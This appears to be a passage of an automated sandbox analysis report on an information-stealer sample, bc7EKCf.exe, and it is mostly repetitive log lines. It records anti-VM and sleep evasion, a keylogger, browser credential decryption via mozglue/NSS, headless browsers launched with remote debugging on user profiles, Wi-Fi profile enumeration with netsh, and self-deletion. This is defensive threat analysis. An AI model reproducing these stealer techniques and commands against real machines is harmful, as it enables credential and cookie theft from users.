                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7608Thread sleep count: 6703 > 30Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7616Thread sleep count: 2858 > 30Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99874s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99414s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99841s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99714s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99589s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99469s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99302s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99158s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99025s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98908s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98773s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98666s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98554s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98442s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98329s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98195s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98073s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97966s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97842s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97722s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97599s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97486s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97362s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99793s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99651s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99528s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99358s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99235s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -99082s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98905s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98755s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98621s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98514s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98398s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98285s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -98053s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97932s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97822s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exe TID: 7604Thread sleep time: -97719s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\bc7EKCf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99874Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99641Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99531Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99414Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99313Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99188Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99063Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99841Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99714Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99589Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99469Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99302Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99158Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99025Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98908Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98773Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98666Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98554Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98442Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98329Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98195Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98073Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97966Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97842Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97722Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97599Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97486Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97362Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99793Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99651Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99528Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99358Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99235Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 99082Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98905Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98755Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98621Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98514Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98398Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98285Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98172Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 98053Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97932Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97822Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeThread delayed: delay time: 97719Jump to behavior
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.0000000003649000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000000.00000002.1756488186.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *QEMU*
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
                Source: bc7EKCf.exe, 00000000.00000002.1756488186.00000000030E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *VMWARE*
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                Source: bc7EKCf.exe, 00000002.00000002.1999064795.0000000006650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, Keylogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, Decryptor.csReference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
                Source: 0.2.bc7EKCf.exe.4ce1eb0.3.raw.unpack, Decryptor.csReference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
                Source: C:\Users\user\Desktop\bc7EKCf.exeMemory written: C:\Users\user\Desktop\bc7EKCf.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonly
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Users\user\Desktop\bc7EKCf.exe "C:\Users\user\Desktop\bc7EKCf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-loggingJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-loggingJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /PID 7536
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /PID 7536
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Users\user\Desktop\bc7EKCf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
